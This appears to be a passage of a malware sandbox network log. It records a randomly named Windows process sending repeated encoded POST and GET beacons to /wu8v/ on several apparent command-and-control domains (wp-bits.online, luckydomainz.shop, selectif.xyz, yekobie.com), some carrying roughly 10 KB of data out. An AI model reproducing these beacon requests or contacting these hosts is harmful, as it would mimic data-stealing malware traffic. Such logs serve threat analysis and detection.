                                                                                                                    10 | 192.168.2.4 | 49753 | 116.203.164.244 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:17.442826986 CEST | 744 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.wp-bits.online
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.wp-bits.online/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=s+c3Badf9t2Jy/hCvLg0tpaxbiLGqWSCidRT9Lw40p1GHPztMSg83h857VJtWFgfeHxXRPz/sN7N/CWEouhZu2256FH4rL6wzoTsHeFeSBjoR4jD6p2AtgMeIA3WanMUbwRAiJtAYZGpAnBTCSqTgAX94hdm8QsNRfS+pXSjwG+duudPrERsmaQpE551/vpIoM5P6dartvDOntMbFXUY1CE=
Timestamp: May 8, 2024 14:06:17.769128084 CEST | Bytes transferred: 346 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:17 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: br


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 116.203.164.244 | Destination Port: 80 | PID: 2132 | Process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp: May 8, 2024 14:06:21.246359110 CEST | Bytes transferred: 10826 | Direction: OUT | Data:
POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.wp-bits.online
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.wp-bits.online/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Timestamp: May 8, 2024 14:06:21.592740059 CEST | Bytes transferred: 346 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:21 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: br


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 116.203.164.244 | Destination Port: 80 | PID: 2132 | Process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp: May 8, 2024 14:06:24.167381048 CEST | Bytes transferred: 457 | Direction: OUT | Data:
GET /wu8v/?MdtlcTm=h80XCq9V6N6s/txg4v4Fr8zmHDyj0DPil4lDzKoi2YAFaI23LxlO/y0x83EXcngteSl0Ff377sWS2kC2x8x2lEbqmRL/y9GY06LsNZ5NdSPXBqH5i7fNvls=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.wp-bits.online
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Timestamp: May 8, 2024 14:06:24.496562958 CEST | Bytes transferred: 359 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:06:24 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 196
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 91.195.240.19 | Destination Port: 80 | PID: 2132 | Process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp: May 8, 2024 14:06:30.047672987 CEST | Bytes transferred: 733 | Direction: OUT | Data:
POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.luckydomainz.shop
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.luckydomainz.shop/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=VtdrFnlpLync7xlFalTNpOMnb058twb4eRKSudb9RvqLKOBUq0zMo6CVjBFoW2qv1kocpjIAvTHMjBEofF8bGa8wrAtKKDN1rykbO5xAMouq4aUad0nMphOBCCKCy1E64P6sj3VFKGiAEfC7h3C8UPIDMzO0NX/EcjvFrIqPYxF8vwKnryFINCtAqYSDeQuR4g==
Timestamp: May 8, 2024 14:06:30.359081984 CEST | Bytes transferred: 701 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:06:30 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49757 | Destination IP: 91.195.240.19 | Destination Port: 80 | PID: 2132 | Process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp: May 8, 2024 14:06:32.886626005 CEST | Bytes transferred: 753 | Direction: OUT | Data:
POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.luckydomainz.shop
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.luckydomainz.shop/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=VtdrFnlpLyncqgVFbGLNl+MkRU58mQb8eRWSucftQcOLKvxUlVzMv6CV3xFtIGqe1ks+pnMAvTDMjA0oeygYUa8ytAtIUzN1rykbO4UlMreq4rEaS1nNgBOCWSKC21E+4P7DjyNrKFKAEey7hii9ePIBCTPAAievECqor4ibZlBaq2b96DkffCJz3fb3TTTYjsjdWDLJihlyoDny1sQROz8=
Timestamp: May 8, 2024 14:06:33.202363968 CEST | Bytes transferred: 701 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:06:33 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 91.195.240.19 | Destination Port: 80 | PID: 2132 | Process: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp: May 8, 2024 14:06:35.730226994 CEST | Bytes transferred: 10835 | Direction: OUT | Data:
POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.luckydomainz.shop
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.luckydomainz.shop/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Timestamp: May 8, 2024 14:06:36.043148041 CEST | Bytes transferred: 701 | Direction: IN | Data:
HTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:06:35 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    16 | 192.168.2.4 | 49759 | 91.195.240.19 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:39.265795946 CEST | 460 | OUT | GET /wu8v/?MdtlcTm=Yv1LGRM7Mjb9pBh1S0mxpOIYfAZ4/RDtaTGh+vP2adeGTIEJhl6Vpo3SkSZ8CVSt6h4P+QwQoy6FjmlMXS0oXaAW/UguTEMtgRYeILR3LZnXobcueVuNljQ=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.luckydomainz.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:39.625897884 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    date: Wed, 08 May 2024 12:06:39 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    x-powered-by: PHP/8.1.17
                                                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                    pragma: no-cache
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EdhTQ/csqXsP5VLDyikruACpxQRj/vGXycnEmwVcH7qE4Y40LZFdLFnJSxBicLlLCvxd/hn5YWTuuYhDwHh83Q==
                                                                                                                    last-modified: Wed, 08 May 2024 12:06:39 GMT
                                                                                                                    x-cache-miss-from: parking-7cbf88ff6b-tlmzd
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EdhTQ/csqXsP5VLDyikruACpxQRj/vGXycnEmwVcH7qE4Y40LZFdLFnJSxBicLlLCvxd/hn5YWTuuYhDwHh83Q==><head><meta charset="utf-8"><title>luckydomainz.shop&nbsp;-&nbsp;luckydomainz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luckydomainz.shop is your first and best source for all of the information youre looking for. Fro


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    17 | 192.168.2.4 | 49760 | 203.161.46.103 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:45.403407097 CEST | 718 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.selectif.xyz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.selectif.xyz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=TzTSTAcuCS2JQK7lN+ZyLk7CtPOWKxrE+ABRkijDK41tDIvhqUXgyW4XwL5gMX0aBtoLX23KJrVy3rba+0/ZQgDU4WlJ/nFxVViExMZe3U3XX3L3JuBMs/7w851KaqKRNuHZ7fEvQIlZUgc30Xmo8arHPb11DS+Xrljx73zLeCov4ZgCKArenW3CmXJg0+jkzw==
                                                                                                                    May 8, 2024 14:06:45.613395929 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:45 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    18 | 192.168.2.4 | 49761 | 203.161.46.103 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:48.138953924 CEST | 738 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.selectif.xyz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.selectif.xyz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=TzTSTAcuCS2JRqrlMdxyNE7BivOWDRrA+AFRkjmGKqhtAq3h4VXgxW4Xk75lIX0RBtk5Xy3KJrxy3vfarTraQwDWhmlXg3FxVViExMdk3QbXWH73KPBPif7/0Z1KeqKdNuG07eYFQKdZUiU30mmnlqqMLb02GSnszn2p+FvrbCQ19fxYbxKJ1WTx7QAU59eto4Po7yttMnhoLA+TD0p993E=
                                                                                                                    May 8, 2024 14:06:48.345973969 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:48 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    19 | 192.168.2.4 | 49762 | 203.161.46.103 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:50.878827095 CEST | 10820 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.selectif.xyz
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.selectif.xyz/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=[TRUNCATED]
                                                                                                                    May 8, 2024 14:06:51.089790106 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:50 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    20 | 192.168.2.4 | 49763 | 203.161.46.103 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:53.601408958 CEST | 455 | OUT | GET /wu8v/?MdtlcTm=ex7yQ3cnGheAaOrzEPkQGznKrbGAUhLo9VsCiDPBWJ5DUtj6oFWZ51Qu3bZCInwfBew3O0jwDr4r/fHP0DTqez+F51VR4AlcQUWQ9cVyxEHzKlzGRO1dndY=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.selectif.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:06:53.811425924 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:06:53 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    21 | 192.168.2.4 | 49764 | 185.135.132.99 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:06:59.840877056 CEST | 715 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.yekobie.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.yekobie.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=Xjaastlsb3LXQqQFeK/BZi+GCRWZzsbJeamKeTAC1DJ4yJCPv4In92LyIKwdX4L4xpSc4yS6AFYXNjWN9RGEZnvc9QlGgVRvK4UlSs9NmjvyLqNq8gAxx1od8ng5W6lQFX9vD+fRhcxLGXC1duFyh91XK45lRdOwmN6/AU7UDqHvTSsBLcdHPXBE/I+kyiHHjg==
                                                                                                                    May 8, 2024 14:07:00.154747009 CEST | 1048 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    22 | 192.168.2.4 | 49765 | 185.135.132.99 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:02.718429089 CEST | 735 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.yekobie.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.yekobie.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=Xjaastlsb3LXTJIFcpXBYC+HNxWZ6MbNeaqKeSES1Qt41raPu8knzWLyDqwcYYK0xpeU43q6AFMXNm6N9gGDaXvexwlE9FRvK4UlSspjmj3yLadquV02vloesXg5S6lcFX9JD/Drhe5LGWy1e/Fxv909HY53Z4nHo9izOXblMJL+b09bat8QdXl3iP3Q/h6O4tDOvJoCcVDa9jmcVxoNwBs=
                                                                                                                    May 8, 2024 14:07:03.030030012 CEST | 1048 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:02 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    23 | 192.168.2.4 | 49766 | 185.135.132.99 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:05.611547947 CEST | 10817 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.yekobie.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.yekobie.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.yekobie.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm= [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:05.926081896 CEST | 1046 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 08 May 2024 12:07:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
